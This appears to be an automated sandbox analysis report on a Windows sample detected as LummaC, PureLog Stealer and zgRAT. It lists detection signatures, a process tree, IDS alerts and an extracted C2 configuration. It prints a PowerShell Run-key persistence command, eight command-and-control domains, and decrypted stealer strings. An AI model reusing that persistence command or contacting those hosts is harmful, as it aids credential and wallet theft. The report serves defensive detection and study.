Edit tour

Windows Analysis Report
57lklPjdPc.exe

Overview

General Information

Sample name:	57lklPjdPc.exe
Analysis ID:	1513633
MD5:	c164ed9887bd51cba150379514dc4e81
SHA1:	178639b8961fa5236683498e06f78b8887155999
SHA256:	b748235a791b5f8c5b80202ef3345bc8325a7ea246b004d57df5521e2f79b429
Infos:

Detection

LummaC, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Set autostart key via New-ItemProperty Cmdlet

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64native

57lklPjdPc.exe (PID: 4264 cmdline: "C:\Users\user\Desktop\57lklPjdPc.exe" MD5: C164ED9887BD51CBA150379514DC4E81)

powershell.exe (PID: 7808 cmdline: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 5896 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

PING.EXE (PID: 4660 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)

l6E.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Roaming\l6E.exe" MD5: FAC2188E4A28A0CF32BF4417D797B0F8)

conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

RegAsm.exe (PID: 5688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7340 -s 1692 MD5: 40A149513D721F096DDF50C04DA2F01F)

57lklPjdPc.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\57lklPjdPc.exe" MD5: C164ED9887BD51CBA150379514DC4E81)

57lklPjdPc.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Roaming\57lklPjdPc.exe" MD5: C164ED9887BD51CBA150379514DC4E81)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["keennylrwmqlw.shop", "tesecuuweqo.shop", "relaxatinownio.shop", "eemmbryequo.shop", "reggwardssdqw.shop", "tendencctywop.shop", "licenseodqwmqn.shop", "tryyudjasudqo.shop"], "Build id": "hv0fRu--"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.50539479323.00000000043CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000000.00000002.50539479323.000000000458A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.57lklPjdPc.exe.458aac8.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.57lklPjdPc.exe.458aac8.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.57lklPjdPc.exe.458aac8.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.57lklPjdPc.exe.7490000.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.57lklPjdPc.exe.7490000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.57lklPjdPc.exe.7490000.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.57lklPjdPc.exe.458aac8.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.57lklPjdPc.exe.458aac8.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.57lklPjdPc.exe.458aac8.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.57lklPjdPc.exe.7490000.8.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.57lklPjdPc.exe.7490000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.57lklPjdPc.exe.444aaa8.7.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.57lklPjdPc.exe.7490000.8.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.57lklPjdPc.exe.444aaa8.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.57lklPjdPc.exe.444aaa8.7.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\57lklPjdPc.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\57lklPjdPc

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\57lklPjdPc.exe", ParentImage: C:\Users\user\Desktop\57lklPjdPc.exe, ParentProcessId: 4264, ParentProcessName: 57lklPjdPc.exe, ProcessCommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', ProcessId: 7808, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Set autostart key via New-ItemProperty Cmdlet

Source: Process started

Author: Joe Security: Data: Command: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\57lklPjdPc.exe", ParentImage: C:\Users\user\Desktop\57lklPjdPc.exe, ParentProcessId: 4264, ParentProcessName: 57lklPjdPc.exe, ProcessCommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String', ProcessId: 7808, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:37:52.547549+0200	2035595	1	Domain Observed Used for C2 Detected	45.11.229.96	56001	192.168.11.20	49782	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:39:03.280632+0200	2054653	1	A Network Trojan was detected	192.168.11.20	49784	172.67.142.26	443	TCP
2024-09-19T02:39:04.111101+0200	2054653	1	A Network Trojan was detected	192.168.11.20	49785	172.67.142.26	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:39:03.280632+0200	2049836	1	A Network Trojan was detected	192.168.11.20	49784	172.67.142.26	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:39:04.111101+0200	2049812	1	A Network Trojan was detected	192.168.11.20	49785	172.67.142.26	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:39:03.062485+0200	2055880	1	Domain Observed Used for C2 Detected	192.168.11.20	49784	172.67.142.26	443	TCP
2024-09-19T02:39:03.569353+0200	2055880	1	Domain Observed Used for C2 Detected	192.168.11.20	49785	172.67.142.26	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:39:02.730227+0200	2055879	1	Domain Observed Used for C2 Detected	192.168.11.20	57305	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 57lklPjdPc.exe

Avira: detected

Antivirus detection for URL or domain

Source: tryyudjasudqo.shop	Avira URL Cloud: Label: malware
Source: reggwardssdqw.shop	Avira URL Cloud: Label: malware
Source: licenseodqwmqn.shop	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/le4K#	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/U	Avira URL Cloud: Label: malware
Source: relaxatinownio.shop	Avira URL Cloud: Label: malware
Source: keennylrwmqlw.shop	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/api7	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/api3	Avira URL Cloud: Label: malware
Source: tesecuuweqo.shop	Avira URL Cloud: Label: malware
Source: tendencctywop.shop	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/api	Avira URL Cloud: Label: malware
Source: eemmbryequo.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen8

Found malware configuration

Source: 13.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["keennylrwmqlw.shop", "tesecuuweqo.shop", "relaxatinownio.shop", "eemmbryequo.shop", "reggwardssdqw.shop", "tendencctywop.shop", "licenseodqwmqn.shop", "tryyudjasudqo.shop"], "Build id": "hv0fRu--"}

Multi AV Scanner detection for domain / URL

Source: http://pesterbdd.com/images/Pester.png4	Virustotal: Detection: 10%	Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 8%	Perma Link
Source: tesecuuweqo.shop	Virustotal: Detection: 9%	Perma Link
Source: https://eemmbryequo.shop/	Virustotal: Detection: 12%	Perma Link
Source: https://eemmbryequo.shop/api	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\AppData\Roaming\l6E.exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: 57lklPjdPc.exe	Virustotal: Detection: 61%			Perma Link
Source: 57lklPjdPc.exe	ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 57lklPjdPc.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tryyudjasudqo.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: eemmbryequo.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: reggwardssdqw.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: relaxatinownio.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tesecuuweqo.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tendencctywop.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: licenseodqwmqn.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: keennylrwmqlw.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: eemmbryequo.shop
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 13.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: hv0fRu--

Source: 57lklPjdPc.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.20:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.20:49785 version: TLS 1.2

Source: 57lklPjdPc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi+0Ch]	13_2_0040F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	13_2_0043F9B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-10h]	13_2_004402B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	13_2_004402B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	13_2_00440477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	13_2_00442EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], dx	13_2_0043FF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	13_2_0043FF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, FFFFFFFFh	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+14h]	13_2_00412001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+01h], 00000000h	13_2_004230CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], bl	13_2_0040D140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00423940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+48h]	13_2_0041A1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+64h]	13_2_004291C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+ebp+02h], 0000h	13_2_0042998F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, word ptr [ecx]	13_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, word ptr [edx]	13_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	13_2_00422200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00426230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+48h]	13_2_0041AAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+14h]	13_2_004012F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00428B4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_0040EB20
